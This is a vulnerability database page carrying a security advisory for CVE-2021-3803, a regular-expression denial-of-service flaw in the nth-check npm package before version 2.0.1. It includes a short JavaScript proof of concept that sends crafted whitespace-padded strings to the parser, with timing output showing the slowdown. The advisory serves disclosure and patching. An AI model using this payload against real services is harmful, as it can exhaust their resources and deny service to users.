Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
osvGoogleOSV:GHSA-RP65-9CF3-CJXR
HistorySep 20, 2021 - 8:47 p.m.

Inefficient Regular Expression Complexity in nth-check

2021-09-2020:47:31
Google
osv.dev
196

0.002 Low

EPSS

Percentile

56.4%

JSON

There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.

The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.

Proof of Concept

// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = '2n' + ' '.repeat(i*10000)+"!";
    try {
        nthCheck.parse(attack_str) 
    }
    catch(err) {
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
    }
}

The Output

attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
CPENameOperatorVersion
nth-checklt2.0.1

Related

nessus 4
prion 1
ibm 9
veracode 1
github 1
debiancve 1
ubuntucve 1
ubuntu 1
osv 3
openvas 3
redhatcve 1
huntr 1
cvelist 1
cve 1
debian 1
nvd 1
nessus
nessus
Debian DLA-3428-1 : node-nth-check - LTS security update
2023-05-21 00:00:00
Ubuntu 18.04 LTS / 20.04 LTS : nth-check vulnerability (USN-6114-1)
2023-05-30 00:00:00
Splunk Enterprise < 8.1.14, 8.2.0 < 8.2.11, 9.0.0 < 9.0.5 (SVD-2023-0613)
2024-05-02 00:00:00
prion
prion
Design/Logic Flaw
2021-09-17 07:15:00
ibm
ibm
Security Bulletin: Vulnerability in nth-check affects IBM Process Mining (CVE-2021-3803)
2023-02-01 21:13:48
Security Bulletin: Open Source Dependency Vulnerability
2023-05-15 17:12:38
Security Bulletin: Multiple vulnerabilities in software used in node.js affect Cloud Pak System
2023-03-31 14:17:53
veracode
veracode
Regular Expression Denial Of Service (ReDoS)
2021-09-20 06:48:54
github
github
Inefficient Regular Expression Complexity in nth-check
2021-09-20 20:47:31
debiancve
debiancve
CVE-2021-3803
2021-09-17 07:15:09
ubuntucve
ubuntucve
CVE-2021-3803
2021-09-17 00:00:00
ubuntu
ubuntu
nth-check vulnerability
2023-05-30 00:00:00
osv
osv
CVE-2021-3803
2021-09-17 07:15:09
node-nth-check - security update
2023-05-20 00:00:00
node-nth-check vulnerability
2023-05-30 08:40:33
openvas
openvas
Debian: Security Advisory (DLA-3428-1)
2023-05-22 00:00:00
Ubuntu: Security Advisory (USN-6114-1)
2023-05-31 00:00:00
OTRS Multiple Vulnerabilities (OSA-2022-04)
2022-10-19 00:00:00
redhatcve
redhatcve
CVE-2021-3803
2021-09-21 15:31:51
huntr
huntr
Inefficient Regular Expression Complexity in fb55/nth-check
2021-09-14 01:52:59
cvelist
cvelist
CVE-2021-3803 Inefficient Regular Expression Complexity in fb55/nth-check
2021-09-17 00:00:00
cve
cve
CVE-2021-3803
2021-09-17 07:15:09
debian
debian
[SECURITY] [DLA 3428-1] node-nth-check security update
2023-05-22 19:39:53
nvd
nvd
CVE-2021-3803
2021-09-17 07:15:09

0.002 Low

EPSS

Percentile

56.4%

JSON
Related for OSV:GHSA-RP65-9CF3-CJXR
nessus4prion1ibm9veracode1github1debiancve1ubuntucve1ubuntu1osv3openvas3redhatcve1huntr1cvelist1cve1debian1nvd1